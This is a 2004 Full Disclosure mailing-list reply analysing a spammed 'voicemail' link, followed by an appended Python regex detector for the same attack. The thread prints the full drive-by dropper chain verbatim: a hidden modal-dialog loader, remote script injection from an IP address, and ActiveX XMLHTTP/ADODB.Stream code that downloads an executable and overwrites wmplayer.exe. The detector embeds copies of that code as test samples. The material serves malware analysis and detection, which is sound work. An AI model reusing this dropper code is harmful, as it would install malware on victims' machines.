Full Disclosure mailing list archives
Re: spamming trojan?
From: Paul Schmehl <pauls () utdallas edu>
Date: Wed, 16 Jun 2004 12:33:16 -0500
--On Wednesday, June 16, 2004 08:23:59 AM -0400 "Geo." <geoincidents () nls net> wrote:

> Received a spam this morning claiming I have a voicemail with the link (warning do not click the link) http:-//www-1voicemailbox-net/voicemail/ (dashes added by me) which brings up a frames based page with one of the frames containing this
>
> function InjectedDuringRedirection(){
>   showModalDialog('md.htm',window,"dialogTop:-10000\;dialogLeft:-10000\;dialogHeight:1\;dialogWidth:1\;").location="javascript:'<SCRIPT SRC=\\'http://219.234.95.124/vbox/shellscript_loader.js\\'><\/script>'";
> }
>
> Anyone want to try and analyze what this thing is? It was spammed to about 30 addresses here this morning.
All this does is call more functions:

function getRealShell() {
    myiframe.document.write("<SCRIPT SRC='http://219.234.95.124/vbox/shellscript.js'><\/SCRIPT>");
}
document.write("<IFRAME ID=myiframe SRC='about:blank' WIDTH=200 HEIGHT=200></IFRAME>");
setTimeout("getRealShell()",100);

The real action is at the "RealShell" address:

var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "http://219.234.95.124/vbox/w_e_d.exe",0);
x.Send();
var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);
s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
location.href = "mms://";

The rest should be fairly obvious from the above code.

Paul Schmehl (pauls () utdallas edu)
Adjunct Information Security Officer
The University of Texas at Dallas
AVIEN Founding Member
http://www.utdallas.edu/ir/security/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
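As an added example (not from the thread), a Python pass that flags the stages described above in a captured script, from the off-screen modal dialog through the XMLHTTP fetch, the ADODB.Stream overwrite of wmplayer.exe and the mms:// launch; the indicator names and the verdict rule are assumptions of this example, and the two samples are constructed copies of the snippets quoted in the thread:

```python
import re

# Heuristics for the ActiveX "fetch and overwrite" dropper pattern analysed in
# the thread. Indicator names are this example's own, not a standard taxonomy.
INDICATORS = {
    # modal dialog pushed off-screen so the victim never sees it
    "offscreen_modal_dialog": re.compile(
        r"showModalDialog\s*\(.*?dialog(?:Top|Left)\s*:\s*-\d+", re.I | re.S),
    # a remote script tag written into the page (loader / iframe stage)
    "remote_script_injection": re.compile(
        r"<SCRIPT\s+SRC\s*=\s*\\*['\"]?https?://", re.I),
    # binary fetched through the XMLHTTP ActiveX control
    "xmlhttp_binary_fetch": re.compile(
        r"ActiveXObject\s*\(\s*['\"]Microsoft\.XMLHTTP['\"]\s*\)", re.I),
    # ADODB.Stream is the classic way to write raw bytes to disk from script
    "adodb_stream": re.compile(
        r"ActiveXObject\s*\(\s*['\"]ADODB\.Stream['\"]\s*\)", re.I),
    # response body saved over an .exe under Program Files (mode 2 = overwrite)
    "save_over_program_files": re.compile(
        r"SaveToFile\s*\(\s*['\"][A-Z]:(?:\\){1,2}Program Files[^'\"]*\.exe['\"]\s*,\s*2", re.I),
    # protocol handler used to launch the replaced player
    "protocol_handler_launch": re.compile(r"location\.href\s*=\s*['\"]mms://", re.I),
}

def find_dropper_indicators(script_text):
    """Names of the indicators present in one script sample, in table order."""
    return [name for name, rx in INDICATORS.items() if rx.search(script_text)]

def classify(script_text):
    """'dropper' when fetch, stream and overwrite all appear; else 'suspicious' or 'clean'."""
    hits = set(find_dropper_indicators(script_text))
    if {"xmlhttp_binary_fetch", "adodb_stream", "save_over_program_files"} <= hits:
        return "dropper"
    return "suspicious" if hits else "clean"

# Constructed samples reproducing the two stages quoted in the thread.
SAMPLE_LOADER = r"""function InjectedDuringRedirection(){
showModalDialog('md.htm',window,"dialogTop:-10000\;dialogLeft:-10000\;dialogHeight:1\;dialogWidth:1\;").location="javascript:'<SCRIPT SRC=\\'http://219.234.95.124/vbox/shellscript_loader.js\\'><\/script>'";}"""
SAMPLE_SHELL = r"""var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "http://219.234.95.124/vbox/w_e_d.exe",0); x.Send();
var s = new ActiveXObject("ADODB.Stream"); s.Mode = 3; s.Type = 1; s.Open();
s.Write(x.responseBody);
s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
location.href = "mms://";"""

if __name__ == "__main__":
    for label, sample in (("loader", SAMPLE_LOADER), ("shell", SAMPLE_SHELL)):
        print(label, classify(sample), find_dropper_indicators(sample))
```

The loader stage alone only rates "suspicious"; the verdict becomes "dropper" once the fetch, the stream and the overwrite of a Program Files executable appear together, which is the combination that actually replaces wmplayer.exe.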